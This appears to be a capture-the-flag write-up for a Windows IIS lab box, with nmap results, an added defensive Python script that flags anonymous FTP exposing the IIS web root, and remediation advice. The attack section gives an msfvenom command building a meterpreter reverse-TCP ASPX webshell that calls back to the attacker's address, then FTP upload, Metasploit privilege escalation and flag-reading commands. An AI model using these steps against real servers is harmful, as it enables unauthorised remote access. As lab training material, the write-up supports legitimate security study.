Basic information

Port scan

Ports 21 and 80 are open:

$ nmap -sC -sV 10.10.10.5
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-01 14:23 CST
Nmap scan report for 10.10.10.5
Host is up (0.079s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 12-03-20 07:18PM 2829 1.aspx
| 03-18-17 01:06AM <DIR> aspnet_client
| 03-17-17 04:37PM 689 iisstart.htm
| 12-03-20 08:10PM 38857 shell.asp
| 12-03-20 08:17PM 38443 shell.aspx
|_03-17-17 04:37PM 184946 welcome.png
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open http Microsoft IIS httpd 7.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 57.90 seconds

Port 80

It is the IIS default page:

Port 21 (FTP)

FTP allows anonymous access, and its directory is simply the web root served on port 80; the aspx files listed there were uploaded by other people:
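The misconfiguration behind this box is the combination of three things visible in the scan above: anonymous FTP login, IIS on the same host, and an FTP directory that is the IIS web root. The following audit script is an added example, not part of the original writeup; it parses the nmap output quoted above (embedded here as a constructed sample) and reports the findings a defender would want raised. The file list and port numbers come from the page; the extension and default-file lists are my assumptions about what IIS executes and ships.

```python
import re

# Constructed sample: the nmap output quoted in this writeup, trimmed to the two open ports.
SAMPLE_NMAP = """\
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 12-03-20 07:18PM 2829 1.aspx
| 03-18-17 01:06AM <DIR> aspnet_client
| 03-17-17 04:37PM 689 iisstart.htm
| 12-03-20 08:10PM 38857 shell.asp
| 12-03-20 08:17PM 38443 shell.aspx
|_03-17-17 04:37PM 184946 welcome.png
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open http Microsoft IIS httpd 7.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
"""

# Assumption: extensions IIS executes server-side; their presence in an anonymous FTP listing is the red flag.
SERVER_SCRIPT_EXTS = (".asp", ".aspx", ".ashx", ".asmx")
# Assumption: files a fresh IIS wwwroot ships with; seeing them over FTP means FTP root and web root overlap.
IIS_DEFAULT_FILES = {"iisstart.htm", "welcome.png"}

# One entry of an nmap ftp-anon listing: "| MM-DD-YY HH:MMAM <DIR>|size name" (first char after | may be _).
FTP_ENTRY = re.compile(r"^\|[_ ]\s*\d\d-\d\d-\d\d\s+\d\d:\d\d[AP]M\s+(<DIR>|\d+)\s+(\S.*)$")


def parse_ftp_anon(text):
    """Return (anonymous_allowed, [(name, is_dir), ...]) from an nmap ftp-anon script block."""
    anonymous = "Anonymous FTP login allowed" in text
    entries = []
    in_block = False
    for line in text.splitlines():
        if "ftp-anon:" in line:
            in_block = True
            continue
        if in_block:
            m = FTP_ENTRY.match(line)
            if not m:
                break  # first non-entry line ends the listing
            entries.append((m.group(2).strip(), m.group(1) == "<DIR>"))
    return anonymous, entries


def iis_ports(text):
    """Ports on which nmap identified an HTTP service as Microsoft IIS."""
    return [int(p) for p in re.findall(r"^(\d+)/tcp\s+open\s+http\b.*\bIIS\b", text, re.M)]


def assess(text):
    """Defender-side audit: list the findings that make this host a webshell-upload risk."""
    anonymous, entries = parse_ftp_anon(text)
    names = [n for n, is_dir in entries if not is_dir]
    findings = []
    if anonymous:
        findings.append("anonymous FTP login allowed")
    scripts = [n for n in names if n.lower().endswith(SERVER_SCRIPT_EXTS)]
    if scripts:
        findings.append("server-side script files reachable over FTP: " + ", ".join(scripts))
    web = iis_ports(text)
    if web and IIS_DEFAULT_FILES & set(names):
        findings.append(f"FTP directory appears to be the IIS web root served on port(s) {web}")
    if anonymous and web and scripts:
        findings.append("CRITICAL: anonymous FTP exposes the IIS web root; "
                        "if the anonymous account can write, uploaded .asp/.aspx run as the IIS worker")
    return findings


if __name__ == "__main__":
    for finding in assess(SAMPLE_NMAP):
        print("-", finding)
```

The fix on the server side is to remove anonymous access (or at least make it read-only), point the FTP site at a directory that is not the IIS application root, and disable script execution for any directory that must accept uploads.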

Getting a shell via FTP

So the route is simply to write a webshell through FTP; generate it directly with msf:

msfvenom -p windows/meterpreter/reverse_tcp -f aspx -o miao.aspx LHOST=10.10.14.12 LPORT=4444

After uploading it over FTP, request it on the port-80 web site to trigger it and get a shell as the web user:

Privilege escalation

Run msf's local exploit suggester module directly:

post/multi/recon/local_exploit_suggester

It returns many suggestions; any one of them will do:

The exploit lands a SYSTEM shell:

Flags

Then just read user.txt and root.txt:

type c:\Users\babis\Desktop\user.txt.txt
type c:\Users\Administrator\Desktop\root.txt.txt

References